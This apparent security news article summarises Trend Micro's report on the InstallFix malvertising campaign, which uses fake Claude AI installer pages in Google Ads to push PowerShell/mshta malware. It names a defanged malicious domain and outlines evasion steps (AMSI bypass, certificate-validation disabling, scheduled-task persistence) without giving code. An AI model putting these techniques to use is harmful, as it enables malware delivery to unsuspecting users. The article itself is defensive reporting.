InstallFix Campaign Uses Fake Claude AI Installers to Distribute Malware via Google Ads
Trend Micro exposes the InstallFix campaign, in which threat actors use fake Claude AI installer pages promoted through Google Ads to deliver malware that disables security features and establishes persistent access.
Trend Micro researchers have detailed a sophisticated malware campaign dubbed InstallFix, which weaponizes trust in Anthropic's popular Claude AI assistant. The campaign, also referred to as the Fake Claude Installer threat, uses meticulously crafted fake installation pages promoted through Google Ads to trick users into running malicious payloads that collect system information, disable security features, and establish persistent command-and-control (C2) access.
The attack chain begins when users search for terms such as "Claude Code" or "Claude Code install" and click on sponsored search results at the top of Google's results page. The fraudulent landing page includes realistic, OS-specific installation instructions that direct users to copy and run malicious PowerShell commands. For Windows systems, the command invokes mshta.exe to download and execute a payload from a known malicious domain download-version[.]1-5-8[.]com. On macOS, a similar command is provided, though the page's buttons are non-functional — a design choice that encourages users to follow the presented instructions.
Once executed, the deobfuscated PowerShell code performs several malicious actions. It generates a unique victim identifier to track infections, disables SSL certificate validation to trust any HTTPS certificate, decrypts hidden strings, and attempts to tamper with internal .NET behavior — likely a security bypass. The payload then downloads additional malware from attacker-controlled servers, with Trend Micro's telemetry confirming the creation of scheduled tasks for persistence and outbound connections to C2 infrastructure.
The campaign employs advanced evasion techniques, including an AMSI bypass to avoid PowerShell script detection, and uses victim-unique C2 URLs that complicate both detection and remediation. The researchers noted that the malvertising URLs mimic legitimate Google Ads link structures, with parameters such as `gar_source` and `gad_campaign` resembling real advertising tracking fields, making them difficult for users to distinguish from legitimate promotions.
Trend Micro's telemetry from TrendAI Vision One identified attacks targeting organizations across the Americas, Asia Pacific, Middle East, and Africa (AMEA), and Europe. Victims have been confirmed in Malaysia, the Netherlands, Thailand, and the United States, spanning industries including government, electronics, education, and food and beverage. The campaign's broad targeting profile suggests the threat actors are conducting indiscriminate credential and data theft rather than focusing on a single vertical.
The InstallFix campaign highlights the growing risk of social engineering attacks that exploit the popularity of AI tools. As modern software installation increasingly involves copying and running commands (such as curl-to-bash), attackers take advantage of this behavior to distribute malware. Trend Micro warns that both developers and non-technical users are at risk, as command-line tools have become common among a wide range of professionals.
Organizations are advised to exercise caution when clicking on sponsored search results for AI tools, verify the authenticity of installation pages by checking the domain, and ensure endpoint detection and response (EDR) solutions are configured to monitor for suspicious PowerShell and mshta.exe activity. The researchers emphasize that understanding these deceptive tactics is critical as enterprises rush to integrate AI capabilities into their workflows.